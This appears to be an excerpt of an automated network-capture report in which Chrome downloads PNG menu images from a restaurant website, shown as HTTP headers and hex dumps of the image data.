                                                                                                                                                    2024-10-01 04:26:47 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 70 00 00 00 4b 08 06 00 00 00 a8 5d 03 25 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRpK]%pHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:47 UTC5499INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:47 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:47 UTC1994INData Raw: 16 2c 1b 6d 0a 1c 27 45 b6 54 40 a4 5c dc 6c 16 1b 03 8c 04 e1 64 10 a6 46 2b 1b ed 58 5d 00 cd 2e 80 2a 0a b1 6c 87 5c b1 80 e3 ba 7c 1f af 81 ed 38 e4 8a 45 52 99 1c 76 3a 8d 9b 18 c8 5c 0e 27 9d c1 76 dd ee 4c d1 24 87 9d 4a 61 39 4e 97 4f 46 ff bf 3b 37 e2 7f a6 a1 ab b5 26 68 34 11 96 ec 4a ea 01 25 35 b1 df 44 28 9d 60 bc 98 95 53 32 ea f8 4b 60 8d 97 b8 fd ed af e2 58 ed 29 96 1f 39 8d 93 b8 b8 e6 1c ba 0d 07 a6 20 3d 5c 66 5e 94 69 ec 1c 60 43 da a3 7e fe 28 51 74 16 6f db bd cc c5 82 a7 bf f1 0d 96 42 28 f5 c1 d6 de 7e aa 53 97 a9 36 21 88 5c 8a a6 8b 29 bb f2 c6 38 0a b1 73 7a d2 48 3c 94 df d5 9a 44 7e 93 4c a1 cc d0 e4 36 ce 3c fb 68 97 77 fc a7 7f 6e c4 ff 4a 16 aa 30 72 59 4c 37 bf 36 ad af 9b 72 c7 46 82 1f 04 11 5d 57 73 97 52 53 8a c1 09
                                                                                                                                                    Data Ascii: ,m'ET@\ldF+X].*l\|8ERv:\'vL$Ja9NOF;7&h4J%5D(`S2K`X)9 =\f^i`C~(QtoB(~S6!\)8szH<D~L6<hwnJ0rYL76rF]WsRS


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    69192.168.2.449836162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:47 UTC393OUTGET /assets/imgs/menu_imges/Sekh_Kabab.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:47 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:47 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 22:58:04 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 39783
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:47 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:47 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 67 00 00 00 4e 08 06 00 00 00 3d e2 08 07 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRgN=pHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:47 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:47 UTC7367INData Raw: 1d 4b d0 5c 29 f2 cf fe dd af 13 7b e0 97 7b 8b dd 6d ae 3c fb c2 6f 3e 7f ec a5 5f e9 4f 87 b9 3e 7d 51 54 35 b2 fb f7 dc 9f 77 8c 7a 5e 3e 71 ee cc 1f ed 9e 18 bb 3d 9e 48 4d b4 da 2d 6c cf 46 51 14 1a ad 26 86 d1 c1 14 4c ba 96 84 6b 1b 34 5b 26 a2 ac d2 b6 44 a4 4e 87 f3 4f 7d 59 68 57 ce b3 ff b6 7e a6 2f 2c 63 2f 80 2e 43 7c 97 8c 67 66 71 16 97 51 02 35 5e 3c 05 99 48 83 9b 0f c3 c2 32 2c cd ae d2 6d 47 71 bd 3a 83 bb cb 0c 3e fa 00 42 ea 1c b9 53 6b 7c f6 5b 23 fc ca 73 25 7e 62 a5 c9 6d 93 9f 20 3c f4 09 50 7b 73 b6 d2 1b 96 81 79 7e 5d d5 8b cf c2 97 bf 02 b1 d8 1f 91 1b 9f e4 d6 7b 8e d2 a9 54 d1 03 31 0e 6d db 49 7b 79 89 76 bc cb 90 3d cb d7 fe f0 3f b2 6d 17 7c f0 50 82 f3 57 35 ae 5c eb f0 40 aa ca ae 91 08 e3 37 bd 85 91 6d bb 69 b4 ca 54
                                                                                                                                                    Data Ascii: K\){{m<o>_O>}QT5wz^>q=HM-lFQ&Lk4[&DNO}YhW~/,c/.C|gfqQ5^<H2,mGq:>BSk|[#s%~bm <P{sy~]{T1mI{yv=?m|PW5\@7miT


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    70192.168.2.449838162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:47 UTC396OUTGET /assets/imgs/menu_imges/Kabuli_Pallow.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:47 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:47 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 19:28:48 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 44675
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:47 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:47 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8d 00 00 00 4b 08 06 00 00 00 4d ef 04 0c 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRKMpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:47 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:47 UTC12259INData Raw: a2 d8 71 8b fd bf f0 db 9c 5a 9e 20 f5 b9 fb d9 bb 3b 4d 42 6c 20 6e d5 f8 9b 43 25 14 3a d8 e3 37 d9 26 46 21 1f 80 d1 0e 4b 9f 01 b9 0a bd 37 b3 fc c4 11 8c 6f fc 2e d1 01 41 d8 1f a7 1e bf 82 84 9d 41 3c f7 20 2c fe 13 b5 c1 37 e2 ba 15 b4 ed 37 42 7c 00 61 76 43 e7 55 08 59 05 e5 18 d4 ff 80 c0 7d 33 48 1f d5 d9 4d b0 72 86 20 d3 8f 21 d2 58 b1 38 ae e3 a1 59 91 cb c2 20 c0 b6 9d f3 dd a4 af b1 34 1a a0 86 12 53 33 c9 74 f4 5e 61 fe db 1a 0b 78 ae 4d 6d ea 14 8b 0b 21 53 27 67 58 29 eb 38 b5 22 71 0b e2 71 0b 77 e5 08 33 95 0a bd bd 97 b0 af 77 98 91 ad eb 59 76 23 9c fe de 4b ec bc 6c 3f 2f 3d 7e 8a fa 6a 9e cc c4 73 e8 c7 7e 0b 43 be 44 a4 6d 98 dd 5b 87 11 9e 41 c3 d3 d1 6b 0d c6 a7 04 c6 d0 16 a2 11 05 57 0a 14 2b c2 fc f3 cf 32 f5 e5 cf 61 d9 93
                                                                                                                                                    Data Ascii: qZ ;MBl nC%:7&F!K7o.AA< ,77B|avCUY}3HMr !X8Y 4S3t^axMm!S'gX)8"qqw3wYv#Kl?/=~js~CDm[AkW+2a


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    71192.168.2.449835162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:47 UTC397OUTGET /assets/imgs/menu_imges/Biryani_Pallow.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:47 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:47 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:11:12 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 36530
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:47 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:47 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 59 00 00 00 4b 08 06 00 00 00 1b 15 2b 3f 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRYK+?pHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:47 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:47 UTC4114INData Raw: 29 96 6d a4 70 0b 91 05 b7 20 08 12 a3 a7 f7 e1 8f 86 b9 79 d3 0e ce f5 cf be eb c4 e9 a1 2f 85 43 3e 24 49 e4 9f 8c 11 ff f8 ee e2 a9 2f fd f5 df 5f bf 89 02 a2 08 95 52 1e 59 52 50 14 15 d9 13 60 6a e4 ea 60 72 e8 c2 9b 6d 4b d6 be a7 a6 b1 03 cb b4 10 8c 22 a2 e0 a2 f9 43 48 8a 8e 51 29 83 ac 92 a9 3a c4 16 df 85 e2 8d 52 9c 1c 62 f5 8a 55 c4 ea 82 bc fe da 7e fc ba 8f 46 af c9 b2 de 6e c6 ae 09 7c e3 b9 37 78 f5 5a 89 85 09 1b d1 28 71 e3 46 81 95 4d 90 e8 ec e0 eb af cd 12 76 2b 7c e2 e3 31 22 cd 9b b9 7e f8 08 31 f5 12 f5 8b 77 30 36 92 c4 ca 8f d0 e0 73 88 d6 05 98 2b 79 b8 70 ad c4 5b 17 d3 f8 72 57 68 8e 5c c4 13 5c c0 d4 b5 53 e4 73 d3 0c 9d bb 46 53 21 83 59 28 93 88 86 89 f6 dc 44 b4 a3 99 a6 de e5 18 e5 3c b6 eb 23 54 d3 8c 37 9c a0 5c 95 10
                                                                                                                                                    Data Ascii: )mp y/C>$I/_RYRP`j`rmK"CHQ):RbU~Fn|7xZ(qFMv+|1"~1w06s+yp[rWh\\SsFS!Y(D<#T7\


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    72192.168.2.449837162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:47 UTC402OUTGET /assets/imgs/menu_imges/Mixed_Kabab_Skewers.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:47 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:47 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:09:38 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 38979
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:47 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:47 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 66 00 00 00 4d 08 06 00 00 00 54 b4 11 97 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRfMTpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:47 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:47 UTC6563INData Raw: 13 3f 7d 17 ca c1 d7 b0 7a b9 8b f9 e4 7f a6 ff 32 13 3b 1a 26 15 cc a3 9a 25 32 a5 3c 7a 2a 87 23 de 8c 50 93 8c 94 72 00 5c ba b8 f2 ef 0c 4d 41 93 05 c5 e1 09 3a 6b 67 06 a9 85 2c 91 cc 15 71 dc 80 b5 17 9e fb 43 15 c0 4a e5 f1 dd fe ba eb f4 9b 9a 4e de 17 62 10 b4 55 0d 55 91 51 e4 41 2c 51 65 b6 97 21 80 12 cb 44 8a 82 1c aa 28 91 46 1c 87 c4 71 4c e4 bb 48 22 82 58 20 a4 78 e0 d5 84 34 a8 e3 c4 db 3c 9b 81 55 c5 22 84 28 26 99 b4 e8 db 1e 61 0c 99 ac 42 5f 51 b0 fb 3d e2 30 c6 48 58 4c e5 a6 d8 5a 0a 69 d9 31 a5 82 45 25 63 91 1a 1e 61 61 fe 22 1b eb 8b 28 9a c9 96 0d 97 ba 31 6a 22 66 3c 11 b1 77 2a c3 de 71 95 d2 e4 24 6e 75 1e 27 b3 1f 5b ca b1 be b2 85 9f 3e 43 3b 57 63 e7 1d ef 60 f9 33 7f 8e d3 58 23 24 cd 78 c6 e7 ca 3b 86 a8 ad 06 5c fa 77
                                                                                                                                                    Data Ascii: ?}z2;&%2<z*#Pr\MA:kg,qCJNbUUQA,Qe!D(FqLH"X x4<U"(&aB_Q=0HXLZi1E%caa"(1j"f<w*q$nu'[>C;Wc`3X#$x;\w


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    73192.168.2.449841162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:47 UTC651OUTGET /assets/imgs/menu_imges/Mantu.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:48 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:48 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 19:29:20 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 37654
